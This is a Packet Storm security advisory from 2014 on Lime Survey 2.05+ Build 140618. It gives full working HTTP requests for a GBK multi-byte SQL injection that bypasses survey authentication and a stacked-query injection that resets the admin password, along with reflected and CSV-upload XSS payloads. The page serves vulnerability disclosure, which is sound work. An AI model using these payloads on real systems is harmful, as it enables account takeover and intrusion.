Exploit the possiblities

Lime Survey 2.05+ Build 140618 XSS / SQL Injection

Lime Survey 2.05+ Build 140618 XSS / SQL Injection
Posted Jul 7, 2014
Authored by Giuseppe D'Amore

Lime Survey version 2.05+ Build 140618 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | c5dc0d959e9d98f2ed4378e62c5ef5ae

Lime Survey 2.05+ Build 140618 XSS / SQL Injection

Change Mirror Download
Lime Survey Multiple Vulnerabilities
=======================================================================

[ADVISORY INFORMATION]
Title: Lime Survey Multiple Vulnerabilities
Discovery date: 02/07/2014
Release date: 03/07/2014
Vendor Homepage: www.limesurvey.org
Version: Lime Survey 2.05+ Build 140618
Tested with: MS SQL Server 2008
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)

[VULNERABILITY INFORMATION]
Class: SQL Injection + XSS
Category: Web

[AFFECTED PRODUCTS]
This security vulnerability affects:

* Lime Survey 2.05+ Build 140618

[VULNERABILITY DETAILS]
Multi-Byte SQL Injection
------------------------

As shown in frontend_helper.php:

******************************************************************
function loadanswers()
{
global $surveyid;
global $thissurvey, $thisstep;
global $clienttoken;
$clang = Yii::app()->lang;

$scid=returnGlobal('scid',true);
if (Yii::app()->request->getParam('loadall') == "reload")
{
$query = "SELECT * FROM {{saved_control}} INNER JOIN {$thissurvey['tablename']}
ON {{saved_control}}.srid = {$thissurvey['tablename']}.id
WHERE {{saved_control}}.sid=$surveyid\n";
if (isset($scid)) //Would only come from email

{
$query .= "AND {{saved_control}}.scid={$scid}\n";
}
$query .="AND {{saved_control}}.identifier = '".autoEscape($_SESSION['survey_'.$surveyid]['holdname'])."' ";
******************************************************************

the function autoEscape is applied on the holdname parameter, this function is defined in the file common_helper.php

******************************************************************
function autoEscape($str) {
if (!get_magic_quotes_gpc()) {
return addslashes ($str);
}
return $str;
}
******************************************************************

addslashes can be bypassed using the GBK charset. So sending this request:

******************************************************************
POST /limesurvey/index.php?r=survey/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/limesurvey/index.php?r=survey/index
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&loadname=chr(0x87) . "' OR 1=1 -- ";&loadpass=test&loadsecurity=89&sid=713149&loadall=reload
*******************************************************************

it is possible to bypass imcomplete survey authentication.

Stacked Query SQL Injection
---------------------------

Sending this request:

*******************************************************************
POST /limesurvey/index.php?r=admin/participants/sa/getParticipants_json HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/limesurvey/index.php?r=admin/participants/sa/displayParticipants
Content-Length: 141
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&searchcondition=&_search=false&nd=1404300424270&rows=25&page=1&sidx=lastname]; update lime_users set password='880e042d271f08cd3c456f28704702a6b0ad1c7b442f257bf40578112c8e6ffb';+--+P&sord=asc
********************************************************************

it is possible to change the users's password.

Reflected XSS
-------------
GET /limesurvey/index.php?r=admin%2fparticipants%2fsa%2fgetAttribute_json%2fpid%2f9b0039e2-b346-473d-901f-7010d2bc88c16c2d4<img%20src%3da%20onerror%3dalert(1)>9b6d6fe2f71&YII_CSRF_TOKEN=76fa68bdfde6a997ee64f01726234fd7897e2289&_search=false&nd=140420566784
GET /limesurvey/index.php?r=admin/globalsettings&sa=a"><script>alert(1)</script>a

XSS via CSV
-----------

it is possible to create a .csv file with inside <script>alert(2)</script>,0 and and upload it with the functionality "Import CSV".


[DISCLOSURE TIME-LINE]
* 02/07/2014 - Initial vendor contact.

* 02/07/2014 - Lime Survey Team confirmed the issue is a new security vulnerability.

* 02/07/2014 - Vendor has fixed this vulnerability on Git.

* 03/07/2014 - Public disclosure.

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close